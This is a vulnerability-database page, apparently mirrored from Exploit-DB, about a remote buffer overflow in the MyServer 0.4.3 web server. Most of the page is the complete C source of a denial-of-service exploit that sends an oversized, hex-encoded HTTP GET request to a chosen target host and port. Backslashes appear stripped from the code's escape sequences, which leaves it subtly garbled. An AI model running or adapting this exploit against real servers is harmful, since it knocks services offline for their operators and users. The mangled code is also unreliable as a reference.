MyServer 0.4.3 – GET Argument Buffer Overflow

漏洞ID	1054149	漏洞类型
发布时间	2003-09-08	更新时间	2003-09-08
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/22700

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

source: http://www.securityfocus.com/bid/7770/info

myServer has been reported prone to a remote buffer overflow vulnerability. The vulnerability exists when the web server attempts to process HTTP GET requests of excessive length.

Although unconfirmed, this vulnerability may be exploited to execute attacker-supplied code with the privileges of the vulnerable web server. 

/* MyServer 0.4.3 DoS 
 * vendor:
 * http://myserverweb.sourceforge.net
 *
 * Written and found by badpack3t <[email protected]>
 * For SP Research Labs
 * 09/08/2003
 * 
 * www.security-protocols.com
 *
 * usage: 
 * sp-myserv <targetip> [targetport] (default is 80)
 */

#include "stdafx.h"
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

/* entire request */
"x47x45x54x20x2fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3fx3f"
"x3fx3fx3fx3fx3fx2ex48x54x4dx4cx3fx74x65x73x74x76"
"x61x72x69x61x62x6cx65x3dx26x6ex65x78x74x74x65x73"
"x74x76x61x72x69x61x62x6cx65x3dx67x69x66x20x48x54"
"x54x50x2fx31x2ex31x0ax52x65x66x65x72x65x72x3ax20"
"x68x74x74x70x3ax2fx2fx6cx6fx63x61x6cx68x6fx73x74"
"x2fx62x6fx62x0ax43x6fx6ex74x65x6ex74x2dx54x79x70"
"x65x3ax20x61x70x70x6cx69x63x61x74x69x6fx6ex2fx78"
"x2dx77x77x77x2dx66x6fx72x6dx2dx75x72x6cx65x6ex63"
"x6fx64x65x64x0ax43x6fx6ex6ex65x63x74x69x6fx6ex3a"
"x20x4bx65x65x70x2dx41x6cx69x76x65x0ax43x6fx6fx6b"
"x69x65x3ax20x56x41x52x49x41x42x4cx45x3dx53x45x43"
"x55x52x49x54x59x2dx50x52x4fx54x4fx43x4fx4cx53x3b"
"x20x70x61x74x68x3dx2fx0ax55x73x65x72x2dx41x67x65"
"x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx34x2ex37x36"
"x20x5bx65x6ex5dx20x28x58x31x31x3bx20x55x3bx20x4c"
"x69x6ex75x78x20x32x2ex34x2ex32x2dx32x20x69x36x38"
"x36x29x0ax56x61x72x69x61x62x6cx65x3ax20x72x65x73"
"x75x6cx74x0ax48x6fx73x74x3ax20x6cx6fx63x61x6cx68"
"x6fx73x74x0ax43x6fx6ex74x65x6ex74x2dx6cx65x6ex67"
"x74x68x3ax20x20x20x20x20x35x31x33x0ax41x63x63x65"
"x70x74x3ax20x69x6dx61x67x65x2fx67x69x66x2cx20x69"
"x6dx61x67x65x2fx78x2dx78x62x69x74x6dx61x70x2cx20"
"x69x6dx61x67x65x2fx6ax70x65x67x2cx20x69x6dx61x67"
"x65x2fx70x6ax70x65x67x2cx20x69x6dx61x67x65x2fx70"
"x6ex67x0ax41x63x63x65x70x74x2dx45x6ex63x6fx64x69"
"x6ex67x3ax20x67x7ax69x70x0ax41x63x63x65x70x74x2d"
"x4cx61x6ex67x75x61x67x65x3ax20x65x6ex0ax41x63x63"
"x65x70x74x2dx43x68x61x72x73x65x74x3ax20x69x73x6f"
"x2dx38x38x35x39x2dx31x2cx2ax2cx75x74x66x2dx38x0a"
"x0ax0ax77x68x61x74x79x6fx75x74x79x70x65x64x3dx41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x0ax0arn";

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target, buffer[30000];
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("MyServer 0.4.3 DoS by badpack3trn <[email protected]>rnrn", argv[0]);
		printf("Usage:rn %s <targetip> [targetport] (default is 80)rnrn", argv[0]);
		printf("www.security-protocols.comrnrn", argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];
	port = 80;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!rn");
		exit(1);
	}

	printf("Resolving Hostnames...n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failedn", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.n");
		exit(1);
	}

	printf("Connected!...n");
	printf("Sending Payload...n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payloadrn");
		closesocket(mysocket);
		exit(1);
	}

	printf("Remote Webserver has been DoS'ed rn");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}

相关推荐: phpBB viewtopic.php跨站脚本(XSS)漏洞

phpBB viewtopic.php跨站脚本(XSS)漏洞漏洞ID 1202591 漏洞类型跨站脚本发布时间 2003-08-07 更新时间 2003-08-07 CVE编号 CVE-2003-0484 CNNVD-ID CNNVD-200308-02…

文章版权归作者所有，未经允许请勿转载。

THE END